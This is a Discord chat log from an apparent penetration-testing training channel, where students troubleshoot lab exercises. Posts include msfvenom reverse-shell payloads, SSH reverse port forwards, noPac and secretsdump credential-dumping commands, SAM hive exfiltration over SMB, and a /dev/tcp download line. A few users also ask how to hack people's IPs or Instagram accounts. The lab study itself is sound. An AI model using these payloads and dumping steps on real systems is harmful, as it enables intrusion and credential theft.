#modules
I think it depends on the module. Some have really poor questions, or aren't applying something directly that was taught.
a couple of times the hint has nothing to do with finding the answer or flag
that as well; basically relying on you having some pre-existing knowledge of some of the other commands thrown at you
I'd say that as long as you're learning and understanding, it's not such a big deal to use the hints. The only module you really want to do without hints is the 'Attacking Enterprise Networks' module.
how many modules are out there on the academy??
tons
cpts covers 28 modules, cbbh covers 22, (not sure how many overlap) then there's fundamental ones
overlaps 11 modules
cbbh has 20 modules
as far as i know
and
There's significant overlap. I've only done CPTS modules, and I'm 57% complete with the bug bounty path.
around 60-70 modules
though think if the modules are part of a skill or job path they put the modules in certain order and the modules already assume you took those previous modules. They do say on some modules that knowledge of previous modules is required prerequisite knowledge.
And many Tier III and Tier IV which are not the part of either
yep
let me count
but overall the modules in cpts should be enough to have you pass cpts. same with cbbh
don't lose your head
lol hopefully I won't, but it gets frustrating asf sometimes
Where we practice after completing module??
After every module, you can see there are suggested boxes on HTB
Thank 🙏
most modules have their own practice lab(s) at the end as well; but if you've done a lot of the getting started stuff then Starting point box/machines are a good place to get a foothold of your knowledge
Hi. I would like to know if an HTB Academy subscription provides access to HTB boxes to practice modules.
been stuck on the AD skills assessment for a bit so trying to brush up on pivoting so make tool use easier
can anyone tell me the difference in the /etc/proxychains.conf files?
most guides say to edit /etc/proxychains.conf, but on kali I only see /etc/proxychains4.conf
or am i overthinking it, and current version is just 4.x so that was added to the filename?
yeah its just a version thing
okay good deal, wasn't getting a clear answer when googling, and even the pivoting module specifies /etc/proxychains.conf but maybe that's what it's named on the Parrot box
No a subscription on the academy site is different than the box site
can anyone give me a nudge on footprinting medium lab? i have no clue how to get in
There are free boxes on htb anyway
Okay thank you
Use the one that's there already.
Where are you stuck?
I can't find the creds of sa
Did you enum other services that are there?
🙂
but my rdp connection keeps dying
hey sorry to bother you but it's throwing up an error whenever I try to log in using sa's password
Send me a dm
kindly check dm
yo
I'm trying to do AD - Bleeding edge but my exploit keeps failing for some reason
these are the commands I'm running and you can see on the left prompt the error I am getting, does anyone have any pointers?
You might have to explain yourself a bit better. No one is going to try and read through your screenshot lol
aight. I'm trying to use cube0x0's CVE-2021-1675. Supposedly I have to craft a payload with msfvenom, which I did. I then have to host this payload on an SMB share, which is what the right shell is doing. And then I have to run the actual exploit (left window), except I get the following error:
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found
so i figure maybe I wrote the path wrong but I don't see where
I have to run this on the machine I'm attacking?
If the local firewall looks good try escaping your backslashes in the smb path
No, your own
Your kali machine
Or parrot or whichever
your command doesn't seem to be recognized by the Parrot machine I'm SSHed into
Ok good good
escaping backslashes doesn't seem to solve the problem
Ok, have you tested the smb path yourself somehow?
Just to check that the file is present in the share you expect
I seem to be able to connect to ////IP/CompData just fine using smbclient
if I try to run ls i get an error tho, is that relevant?
NT_STATUS_NO_SUCH_FILE listing *
The original error you're seeing means that the remote box is looking at your (at that point UNC) path, tries to download the resource and goes "hmm, that's not right.."
What you want to try to figure out is which of the many possibilities of that communication going wrong is causing you trouble
the command I used to create the smb server is the following:
sudo smbserver.py -smb2support CompData ./payload.dll
is that correct?
What I like to try in this case, I.e. when I think something is right but I'm not sure, is to try a simpler example
E.g. Trying to expose just a simple dir on smb
Then you can always add extra params and such
I would expect the last input to be a folder name, but I don't remember the syntax by hand
Ah, progress ::D
It's like riding a bike: you never entirely forget.. 😂
Too many hours spent yelling at a terminal for that
Hey there, I am trying to solve AD & NTDS.dit password cracking section
I am having some issues when trying to copy the NTDS.dit file from the shadow copy of C:
not sure why the command is not recognized, though the shadow copy is created successfully
any hint?
thx
seems that is not copying the file 🤔
can I dm u?
I'm lost on Nmap medium lab.
What's the question? What have you tried? Where are you stuck?
help me in footprinting hard lab
SNMP is an open port; I tried to enumerate SNMP with onesixtyone but nope, no results
onesixtyone -c snmp.txt [ip]
I'm pretty sure that's the right command, can you DM me your command and output?
ok
Hello! I need help with the "Network enumeration with nmap" in the "Firewall and IDS/IPS Evasion - Medium Lab". I think it is Module 19, section 118. Please!
I think I found the answer but when I try to submit it I get a wrong answer, I am pretty sure I found the right flag
Dm your flag to check
ok, thanks!
look what you can find in the home folder of d. maybe you can reuse it for someone else.
Thank you sir, I’m actually finished with the module! I appreciate you coming back though. Hopefully this will help others if they search. 🙂
hey @hazy grotto can I dm you real quick?
Certainly!
Hello! I need help with the "Network enumeration with nmap" in the "Firewall and IDS/IPS Evasion - Medium Lab". I think it is Module 19, section 118. Please!
Try running an nmap scan with a different protocol. One that is connectionless.
ok thanks, I was trying to capture the flag with tcpdump
no problem, feel free to direct message me if you need further assistance.
Hyy
Hloo9
Hey can I use the PWN Box in HBA for learning blackeye?
No outside targets
a general question is there no keyword defined as cookies in python
while I was declaring it, Python was giving an error, and I fixed it by using cookie instead of cookies
if someone can help :0
I'm not sure I understand your question. Python does not have a lot of keywords and I doubt cookies, or cookie is one of them.
you can get a list of Python keywords with: `import keyword; print(keyword.kwlist)`
You must be using a module in Python
Hello! I'm on the Skills Assessment - File Upload Attacks and trying to do the ||xxe|| in order to leak the source code of the Web App and find the ||upload directory||.
The base64 code gives me my payload, and not the source code. Can someone help me?
p.s. Happy New Year to everyone!
Question about using chisel based on what's in the proxy/tunnel section of the CME module. It describes using the server from the victim but I don't understand why you'd do that since you can always use --reverse options to control directions.
yeah, was using the request lib in Python
Can someone please tell me what I'm missing on the Attacking Common Services medium skills assessment? I found 4 open ports || ssh, dns, pop3 and pop3s ||. I can't even try to get into ||pop3|| without a username, and I don't see how I'd get that from ||dns||. I know I'm missing something, probably something pretty obvious, but I don't know what
i reset the machine and now there are 2 more ports open
Anyone for small question about Enumerating and attacking active directory module ?
Potentially
I am on Redeemer and I keep getting an error for my nmap script saying it's "illegal"
hi all.
On SQLMap Essentials - Skill Assessment, just need a check on some syntax.
|| sqlmap -u http://<HOST-TARGET><PORT>/<hidden>.php --data '{"id":1}' --batch --dump --tamper=b****** ||
I'm getting "unable to retrieve db names"
Skill assessment completed alone ! yippee DM if you need help!
You'll have more luck posting in #boxes
that's not showing up for me in the Discord channels
You need to verify your account. Check the rules
In the module ATTACKING COMMON APPLICATIONS / WordPress - Discovery & Enumeration, any idea how to find the first question: "Enumerate the host and find a flag.txt flag in an accessible directory."? I've been through all the folders of http://blog.inlanefreight.local/wp-content/plugins/mail-masta and http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/ don't know where else to search
So doing the File Transfer module and the optional assessment for Windows Uploads. Running into an issue on the RDP where making calls to outside websites via curl or the Powershell thing isn't working. any ideas on this?
someone?
@rustic sage dm me
Download the file you want to your attack machine and host it on your own HTTP server
HTB machines can't reach out to the internet
Just finished the Attacking Common Services module. Those skills assessments were really fun. I think the medium and easy should have their names swapped tho
The hard skills assessment is beautiful
Now i have to do Pivoting and then I can finally start the AD module
Hammer or screwdriver?
feta or asiago
In the Active Directory module / Bleeding Edge Vulnerabilities ,
the Nopac method doesn't seem to work. Any idea what's wrong with this command? python3 /home/sarah/Téléchargements/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 10.129.110.11 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
[-] If ssl error, add -use-ldap parameter to connect with ldap. Error: socket connection error while opening: [Errno 111] Connection refused
Its a serious answer
bro yes
Use the tool for the job
sometimes windows is necessary, sometimes linux is necessary
nobody cares
also this channel is for academy module discussion, keep it on topic
ok
go verify your account in #welcome and then ask your random questions in general chat
I'm struggling to understand something in File Transfers: Linux File Transfer Methods, download with Bash.
What exactly is exec 3<>/dev/tcp/10.10.10.32/80 doing?
I know that exec is running a command, I'm assuming that 3 is a file descriptor, but I only know of STDOUT(1) and STDERROR(2) - so what's 3?
WHAT BRO ,no have linux
So the <> is the diamond operator, and opens a file for reading and writing. So I'm assuming that first command opens /dev/tcp on the target box for down and upload?
stdin too
Oh yeah, that's 0 right?
So I think 3 is actually anything you want it to be. I've found this resource which is quite good: https://catonmat.net/bash-one-liners-explained-part-three
So you could do something like this:
exec 5<> file and that opens 'file' for read and write and assigns it to file descriptor 5.
so it looks like that's what's happening in exec 3<>/dev/tcp/10.10.10.32/80: we're assigning that host/port to fd 3 for reading and writing.
Can anyone help with the SMTP footprinting final exercise? I've run the command multiple times and also tried metasploit but I either get results saying that none of the accounts exist or all of them exist... 😅
And yes I also set the reply timeout to 15 and 20
I also tried using different modes
GG
And when running VRFY manually I always get a 252 (yes I know what it indicates), which is what we're "warned" about in the module
Use the list provided in resources
And yes, did that too
Did you try all the different methods for user enumeration?
the common tools default to one method out of the recommended three, but iirc only one of em actually works for the practical and its not the default
Yes, also tried using different modes
If you are using the user enum tool this should be right; also for Metasploit I have no note about having to set any delay, so Metasploit should also work. Try restarting your target machine
I'll try restarting then
Delay is needed for the metasploit module, not sure how to replicate that in the args line
just to make sure the Metasploit part in my note is right, I just gave it a try and still found the right user without any delay
also there is no option for delay 🤣
oh wait no i found the delay option i'm dumb
Is there a script arg delay option?
it's set to 10 but in the enum tool you need to use at least 15 or 20 so that's kinda weird
in metasploit?
also this is right but for the user enum tool
No, using the nmap route
yep i found this tag on nmap site --scan-delay
Yes but I think that's for the scan itself, not the script
oh for that i think you have to experiment a lot with some of nmap rate tag
Still the same results
With VRFY all usernames are valid, EXPN none of them are
The -w option is for smtp-user-enum btw
I don't see one for Metasploit
I don't have notes on the exercises for the footprinting module.
iirc you need to add the -d flag (domain)
yup, did that
Are you sure you used the rcpt mode though
I think so, but I don't have notes on that exercise 😅
Oh no worries I got my wires crossed
thats 2/3 recommended methods, ya try the third one
try without the domain; if that still doesn't work, shoot me a DM with your command
Thanks
Can someone help me with the Pass the Hash module? I am stuck on David's hash. I am attempting Invoke-SMBExec and I am getting "does not have Service Control Manager write permissions". So I attempted to RDP into his account on the target, then network into 172.16.1.10, and I can see all of the shares but do not have permissions to the shares with David's account.
Hi everyone ! i'm having a headache about NMAP - Firewall & IDS/IPS Evasion: Medium Lab; i'm missing something with the filtered port, begging for help ❤️
For the IMAP question, I'm submitting the flag I found but it's incorrect
Not sure how to fix this... There are no extra spaces
Ah my mistake, the flag I found is for another question
module and section: XSS phishing
I tested the link I made with the steps it showed me, entered test and test as username and password, and I was able to capture it through the PHP server and it worked, but when I send it to the "victim" in /phishing/send.php it says URL sent, but it isn't working and I won't receive anything
I used my ifconfig tun0 10.10.xx.xx IP
command injection assessment (Permission denied). i need some hint
so i figured out how to get SMBexec to work and there are a few ways to get the flag on this one. I encourage everyone to take the time to figure out how to get SMBExec to actually run on this module because it opens up another foothold if there was more to the box.
Hey guys. Yesterday I was having issues with cracking hashes. I couldn't crack a hash but was able to pass it.
today I wanted to see if it would do it again. Would someone please take a look and see why hashcat and John the Ripper both won't run? They both say exhausted and quit after 5 seconds.
$ hashcat -m 1000 thm.hash /home/ruderaph/Downloads/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 3923/7911 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile 'thm.hash' on line 2 (CBFDAC...8F9CAB4083784CBD1874F76618D2A97 ): Token length exception
Hashfile 'thm.hash' on line 3 (1C8BFE...2AA37FC4CCE4FC946683D7B336B63032): Token length exception
Hashfile 'thm.hash' on line 4 ($2y$12...eeUznr71EeNkJkUlypTsgbX1H68wsRom): Token length exception
- Token length exception: 3/5 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
- Zero-Byte
- Early-Skip
- Not-Salted
- Not-Iterated
- Single-Hash
- Single-Salt
- Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
- Filename..: /home/ruderaph/Downloads/rockyou.txt
- Passwords.: 14344384
- Bytes.....: 139921497
- Keyspace..: 14344384
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 279412f945939ba78ce0758d3fd83daa
Time.Started.....: Mon Jan 2 17:51:24 2023 (4 secs)
Time.Estimated...: Mon Jan 2 17:51:28 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/ruderaph/Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4310.7 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 38%
Started: Mon Jan 2 17:51:24 2023
Stopped: Mon Jan 2 17:51:29 2023
have you checked your pot file
can someone plz help me
🙂 hey. Would you tell me what that is?
I run hashcat on my windows machine, so I can use my GPU, so I am not 100% sure if the folder structure is the same on Kali/Linux
Ok, I see some hashes that are cracked but none that I'm trying to do.
send me the file you're trying to crack
@hazy grotto I just grepped over rockyou.txt with the password that crackstation gives and it doesn't show in the list
Well... I was doing the hardlab yesterday...
And someone a lot smarter than me was helping me. I was using the same wordlists as him and everything I tried wasn't working.....
which hardlab?
When in doubt check crackstation 😐
password attacks
nice im in the middle of it right now, just finished Pass the Hash section
So if i was running rockyou..... wouldn't take longer than 5 seconds to go through the list?
would you mind DMin me your notes for getting Davids Flag. I want to compare
DM and i can help
Seems so
I was really weirded out at some point because john was stopping after 2-3 seconds with a zip file
Seems like I just had the wrong wordlist
Not that they weren't long
if you already ran it before it might be in a cache and just skipping it to not waste time
But if you're using non-mutated wordlists you might aswell go to crackstation
Saves you time and headaches
I'm going through my notes running the same commands as before which had results. Nothing is working for it anymore.
john --wordlist=mut_password.list doc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
"No hashes left to crack" means it's already in your potfile. Run john --show doc.hash
Modules that do brute forcing without some kind of direction should really be removed. -_-
Most of them aren't bad. Usually it'll only take a few minutes max. But there are a few sections that are ridiculously long. I believe they're being worked on
I just did the gitlab user enumeration section, and there's really no reason not to tell you which list to use.
iirc the hints give a suggested user list if not stated in the module outright for the gitlab one
The section used a custom wordlist, so I didn't see anything that would hint to which one to use. I just started with the smaller ones, and moved up, but I can imagine many newer users might use the bigger lists, and complain about timeouts/machine expiring.
Hello, I'm having some trouble with something from the File Transfer Module. I'm trying to test the wsgidav python server on my linux box, and connecting to it from my windows host machine. After configuring the server like the example shows, I keep getting a "Cannot find path [ipaddress]\DavWWWRoot because it does not exist" error. Could this be a Firewall issue or am I missing something? Never used wsgidav before. Thank you in advance. ----Also, I have been able to connect to it every other way described in the module
@stuck hull hey, sorry i logged off. mind if i dm you about that Nmap medium lab?
hello i want to download to macbook hornycraft
anyone got any quick hints with the Login Brute Forcing Skill Assessment - Website? The first section is just "bruteforce this" with no information and I've been just going through various wordlists for hours. Basically just do you know what lists will have what I need
figured it out. anyone looking for help, you'll have to use the || -C || flag, and look back through what you've already done
Hello! I need help with the "Network enumeration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!
Anyone around to help me troubleshoot reverse SSH port forwards? I'm trying to get a meterpreter shell from the Windows machine, but for some reason Metasploit won't accept the connection? I can catch a shell using ncat, but when I try to use Metasploit I get nothing
I'm heading to sleep for the night, but I'll try to provide as much info as I can so that hopefully I wake up to an answer.
Reverse Port forward command:
ssh -R 172.16.5.129:8443:0.0.0.0:8000 ubuntu@10.129.69.138 -vN
MSFVenom Command:
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 LPORT=8443 -f exe -o shell.exe
Using the above reverse port forward and the payload generated with the above command, I'm able to get a reverse shell no problem when executing from the internal Windows machine (screenshot attached)
Reverse Port forward command:
ssh -R 172.16.5.129:8443:0.0.0.0:8000 ubuntu@10.129.69.138 -vN
MSFVenom Command:
msfvenom -p windows/x64/meterpreter/shell_reverse_https LHOST=172.16.5.129 LPORT=8443 -f exe -o shell.exe
(Same payload used in the SSH Reverse Port Forward example)
Multi handler Settings:
set LHOST 0.0.0.0
set LPORT 8000
set payload windows/x64/meterpreter/shell_reverse_https
With the above setup, now I just don't get a callback. I can see the connection happening in the reverse port forward log, but Metasploit just sits and does nothing. Doesn't say connection received, doesn't say exploit failed, nothing. It just keeps listening
try with a normal shell instead of the meterpreter shell
I did
The image I attached is the shell I got
A regular shell works fine
I can't figure out why I can't get a meterpreter shell tho
I’ve just started my cybersecurity journey, does htb have a free learning course for the same or paid?
oh, that's just because a meterpreter shell is way too big to route through 2 networks
But wouldn't I at least get the "exploit completed but no session was created" message? Or an exploit failed message?
I get zero output in metasploit
the Academy has free modules in Tier 0 and I think Tier 1 also; if you are new to this and want some free stuff to get started, check out the TryHackMe free path
nope i think the shell just doesn't go through or something
Hmm. Interesting. Cuz I noticed that if I use the wrong payload I get the "failed to open session" output
try it on the Pwnbox, because on there the shell doesn't have to go through a second network (your VPN), so the meterpreter shell should work on there
oh that is Interesting
So I was thinking maybe it's something with the https payload
But I'm not sure
I'm getting back on to play with it more now lmao
can anyone help me with imap? like how to get the id of a msg in a mailbox?
I need help with the "Network enumeration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!
it's not explained well but think of it as a LIST not necessarily a specific ID #
I had to google that one myself
you need to change the source port somehow
i been stuck on the hard lab
footprinting
idk how to grab the mail
I was right. It's something about the https payload. I just got a meterpreter session using reverse_tcp
oh wait what?
just told you :) it's not necessarily a specific ID like ahu4968590; it's more about think of it as picking from a list
trying again with http to see if it's specifically the https payload, or if it's the way Metasploit handles HTTP requests in general
Ok, so its gotta be something specific about the https payload
cuz http worked perfectly fine
maybe it's a weird syntax difference?
huh... like it's stuck in transit phase
I can see the request coming through in the reverse forward log
Its gotta be something with the way metasploit handles https requests
Cuz http works perfectly fine
retro term?
yes
cool
Well, that's enough for tonight. I'm tired and don't have the energy to look into this now. Will attempt to figure it out tomorrow morning
😴
is it normal for nmap to take a really long time when running through proxychains? with -sT -Pn flags on the default ports
Yeah. Life is painful when run through proxychains. Source: doing a prolab...
I suppose it depends how long though? You can hit an unbound key and it'll give you status
"Nmap done: 1 IP address (1 host up) scanned in 1698.46 seconds"
eventually got the results, but wasn't expecting that
Half an hour? Is that with services and stuff too?
was just proxychains -q nmap -sT -Pn 172.16.6.50
is there a way to manually dump a user's ntlm hash in AD, provided I'm authority/system?
a living off the land method
you mean like a native PowerShell command? xD no. You can save HKLM\SYSTEM and SAM and dump them back on your host machine.
ok, basically I have an authority/system shell on a machine with no tools and I am tasked with retrieving a specific user's password, do you have an idea on how to do that?
are you doing a module?
yeah
the active directory module?
can you not just... put your own tools on there
i don't think these modules have defender running even.
my notes for that section of the module are using secretsdump.
can you use secretsdump with a golden ticket?
I tried to but i might have miswrote the command because it asked for a password
is it the DA bross question?
yeah
If you scroll up in the section it has all the syntax there.
it does?
I see the syntax for getting into the system but I don't see dumping hashes
wait, have you already got the psexec shell? sorry. Just set up an SMB server and copy HKLM\SYSTEM and HKLM\SAM over then
it says I can't access the smb share I'm trying to upload the saves to because of company policy
oh because you needed to specify creds with this module for smb servers. sorry 🤦
i don't have specific notes on how I obtained the hash, so just assuming I did secretsdump or mimikatz or something
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/bross should just dump their hash, no?
the section has you dump creds from krbtgt in my notes. i'm guessing given the question you can just do bross instead of krbtgt then.
idk why I didn't write down what I did. I can only assume it was straight forward haha sorry.
@candid zephyr for the AD skills assessment, any advice on using secretsdump ? have had my session interrupted 4 times now before it can finish
nah it doesn't work
@candid zephyr what's wrong with my syntax?
you have to specify a filename, so: move sam.bak \\ipadd\folder\sam.bak. If you've created a user locally then you specify the creds when making the SMB server: smbserver -smb2support compdata . -user hacker -password Password!
i've no idea why your instance is borked 😦
even w/ full filepath for sam.save i get the same error
it runs for a while, but there are loads of users, and the meterpreter session dies somewhere deep in the process lol
on your Kali machine do smbserver.py -smb2support sharename . -user our1 -password our1
then on the box you want to transfer from do net use \\ipadd\sharename /u:our1 our1
then copy sam.bak \\ipadd\sharename\sam.bak
You should be good to go then.
Alternatively you can copy mimikatz from your SMB server to the box and do it that way: copy \\ipadd\share\mimikatz.exe mimikatz.exe
i think the way it initially teaches you (looking at the module rn) is with mimikatz.
I went back to it after screaming into a pillow and found a much simpler way. You were right in saying I could use secretsdump for this task and the correct syntax is: secretsdump.py logistics.inlanefreight.local/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-user bross
Anyone finished the Shells and Payloads section? I can't seem to get this right?
Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudnaumaspx)
have you tried find / -name laundanumaspx ?
i tried something similar. Let me try that. But i get permission denied with that.
even as root
try in your command ||laudanum*||
or just ||laudanum||
you're root so there's really no reason to get permission denied
try using sudo
hello. linux priv esc - skill assessment - flag5. well. I have a nc shell and a meterpreter but cant figure out how to esc priv. whatever I try, I am just coming empty handed. Please someone push me to a right direction
well I am totally lost 
Yeah i dont get it. I even reset the box and am still getting the same thing.
maybe you just dont have priv to see that file
why don't you try to ||search where the laudanum shell is usually stored and browse there||
anyone for this one?
@pliant sage Thats what i did originally. The only file there is shell.aspx
have you submitted the full path of this file?
I need help with the "Network enumeration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!
I did that also
Are there any efficient ways of running hashcat separately from my machine? I'm using a laptop with a VM, so everything is pretty limited. I tried a Linode server, like a 1GB one, but it didn't have enough allocatable memory. Update: I tried the Pwnbox and that says I'm looking at 7 days to crack one hash. There must be a better way
@pliant sage I see what you mean. I submitted the path but not included the file name
Thanks
did it work?
Yeah, that worked. I don't see why it needs the file name, but it does clearly state the full path.
great!
Thanks
hello guys, any German guys here??
@austere tide oh nice, can I send you a PM?
module pwd attacks / section Passwd, Shadow & Opasswd - question: Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
when they say credentials from Will
do they refer to the previous section?
cause in the previous section I only captured firefox creds
if you guys can support before i start the practice would appreciate
thx!
i'm not sure if I should have captured additional creds
😬
Hello all, is there an issue with targets?
I have trouble connecting to targets spawned
not that I know
after a while it turns unresponsive and I have to respawn since yesterday
can anybody help me?? how do I connect to the VPN server?
sudo openvpn <file_name>
Great resource I found for IMAP commands:
can anyone help me in : Skill Assessment - Broken Authentication
Well the answer to the previous question was the password for the "Will" user. So if you finished the previous section you have the password
Great thx
25340'9865879'40539687'28'5298'2849053'280495'809358'3427627'5490385340985 Wi-Fi
noononon
xD
ym live on twitch bro
Can any of the #mods take care of this
LOL
@carmine kiln this guy above when you can pls ... thx
cheers!
I am working on the footprinting module and the last DNS question is making me bang my head against the desk. I bet I am thinking too hard about this, but it's no fun anymore. I don't get it. Any help would be much appreciated
Where have you got to?
I found the second NS but cannot bruteforce both domains to get a system with .203
You need to find a really ||fierce|| wordlist.
wow, okay. got it
I think I tried every other but that one. Should've been more thorough. Thanks for the help!
Is there a way to see the hints after submitting the answer or is it just best to always check the hint first?
Yes. You should be able to see the hints after submission - try refreshing the page.
What if the password wasn’t nibbles. What should we do?
Connect to HTB and show offline
This worked. Thank you!
Have you connected to the vpn?
Not able to connect
What?
VPN
Yes you need to connect first
From where?
I have kali
Have you done this yet? https://academy.hackthebox.com/module/details/15
That explains how the platform works and how to connect to a box
Thanks
Looking for some help on the Broken Authentication Skill Assessment. I have a list of users and feel I've filtered the list according to the password policy, but I'm unable to login. Anyone finished this that could provide a hint?
I finished the SNMP section, but I'm wondering how to know what OIDs to query?
My guess would be, unless you know of one through some other enumeration - brute force and look for something interesting.
The OID for the script on the host is pretty long and I tried looking it up step by step but the reference page only knows up to about half of the full OID
Ah I see
anyone on Password attacks - section Passwd, Shadow & Opasswd sec
to get a hint on the question: Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
thx
@solar granite Hey! Can I DM you regarding this? I guess I found which parameter is vulnerable but I can't see where the output is on the html...
Can you help me with this? I think I found the injection parameter but I can't see the results in the html response
It shows option error
Any one??
sudo
@west canopy What do you mean "a little bit off" here?
Hello I'm glad I can join this community I don't know where to start
Anyone know of any modules or tutorials on how to use UACMe?
I saw it mentioned in the "Printer Operators" tasks from the Windows Priv Esc module.
I tried to use UACme (Akagi64.exe) and used a key which the OS version is vulnerable but it didn't work. I did the exact same thing in the UAC part section and it did work. I just need some more explanation and example usage of this tool.
Hi Team, can somebody give me a hand on the Vulnerability Assessment module? I tried the first Nessus Skills Assessment, spawned the Target machine but it seems to be a Linux one and after the scan all answers are incorrect. The page talks about another IP that I cannot ping. In short, a little bit confused
Hi all, on the Linux fundamentals module I was working on the following question:
Which kernel version is installed on the system? (Format: 1.22.3)
The version on the machine is 5.18.0
But the right answer is: 4.15.0 which is actually an outdated one, I had been searching for quite a while..
Does this often happen with future tasks as well?
If so is it possible to work with an outdated version instead?
Have you logged into the target?
Hello! How can I hack a person using their IP address?
I hacked a lot of people with grabify, want to profit from that.
lmao you hacked nobody with grabify, that's not even hacking
Oh I am sorry
I get the ip
I used spawn target option.
okay, but have you logged into the target?
there's no such thing as "hardware ip", ip addresses are assigned
madf0x, please drop it
ok
There is visible ip, sites see it.
There is hardware ip, like a device ID
I'm guessing I have not logged into the target yet?
as I'm not entirely sure what you mean by that.
use the provided credentials in the section of the module, they are in the exercise
ah found it, thanks!
Does anyone know how to hack ig accounts?
ig?
lol
💀
price?
Is this HTB:academy modules channel a joke?
Dms
y'all really need to read the rules
ColdWind (762396486679396382) has been banned until 2023-01-31 19:41:34 (UTC).
this is not the place
most of the server channels require being verified to view, but the academy section doesn't, so it often becomes a dumping ground for new people that spam, scam, troll, or just plain don't even glance at the rules
It's always white names causing problems
Tag whatever mod is online atm
I think one of em said there were plans to improve the situation but ya know with servers large as this things move slowly
How should I learn scripting for pentesting? Should I do it before or during the time I take the Pentesting job path?
I'd probably say beforehand
you won't need it too much for the course, but a ton of things will be 10x harder if you don't have a little understanding beforehand
Any tips on how to learn scripting?
Learning scripting isn't much different from learning programming, just at a smaller scale. Start with something like bash scripting since you def use that in the course, and then pick up a little python too. I highly recommend at least learning enough about PHP to not get totally intimidated reading it.
with the hyphen as well lol. that was annoying, i knew the answer immediately but had to submit about 10-20 answers to get it correct 🤦♂️
Powershell stuff will also go a long way and is used throughout the course
Alright, thanks man. I have a good understanding of Python, and I just started a book on bash scripting. Just not sure what I actually need to make
Just remember, you don't need to master the subjects, you just need to understand enough so that when you're looking at it you're not totally lost
I will try to ask my question again as too many trolls wrote at the same time in the chat... Hi Team, can somebody give me a hand on the Vulnerability Assessment module? I tried the first Nessus Skills Assessment, spawned the Target machine but it seems to be a Linux one and after the scan all answers are incorrect. The page talks about another IP that I cannot ping. In short, a little bit confused
Did you log into the target?
they give you a host box that has an internal network with the real targets
how can I log into the target??
It should tell you the creds
Hello I need help with the Passwd, Shadow & Opasswd section under Password Attacks module. I have found the passwd.bak and shadow.bak files and transferred them to my host, unshadowed them I believe and then attempted to use hashcat but to no avail.
Am I doing something incorrect?
There is just a button to spawn target
TBF, it literally is written like that in the text.... :p
Right above the first question it says to authenticate as the user htb-student with password
Although it would never be written like that by anyone that I've met.
yes I saw that but I dont know how to login
It says in the scenario description to log into the web interface
yes but there is nothing after putting that in my web browser
I will attempt to use a different wordlist.
On AD Skills Assessment II, how do you find the config file that shows how to connect to the MSSQL instance?
Where do Windows users love to stash juicy configuration files?
Solution solved, disregard.
ill double check
first I didn't even check the text but I did like ||MAC, MAC Address, MAC-Address, Media Access Control, MAC Addressing|| and a load more I can't remember before I got to the right one 😅 HTB should really apply regex to Qs imo to take various answers and at the very least, trim spaces.. so many times I submit flags with a space at the end
I would like them to regex answers yeah
Cheers, working on Footprinting medium lab right now. Found ||the important file|| but the content gives me a failed login. What am I missing? can't seem to find anything else to work with.
works for me, you using the nessus web interface port? 8834?
yes. but nessus is not the target, it's my computer
I don't have notes on that assessment but is that the one where you find ||the key?|| if so you may have some formatting issues from copy pasting. Was easier to paste into sublime and save it that way.
if thats not what im thinking about then oh well
huh?
Ugh I can’t remember
or do I have to use a special machine (VM) to make it work
Go through your notes for the module
you've lost me now
For AD module? Or password attacks?
Sure
for AD module
They cover it pretty explicitly in one of the sections
@real cedar continue footprinting to be sure you can continue with it... the password only is not working
DM if you still have issues
It's a channel that does not require verification of account to access
Is it about ||the port 1433 not being used but 1434? Haven't seen the typical 1433 with netstat. If not, I'll continue looking.||
Thanks! I’ll go look now
I looked there before but somehow missed it. I feel like an idiot lol. Thank you!
Np it happens, aggressive note taking helps a lot with these modules!
I learned my lesson after footprinting lol
My notes from when I started to now are night and day
"oh it also is doing this function... That helps me with my foothold"
To the point I've considered redoing earlier modules just to re-up my assessment notes
That's kinda what I'm doing as I redo my notes, including rerunning the labs
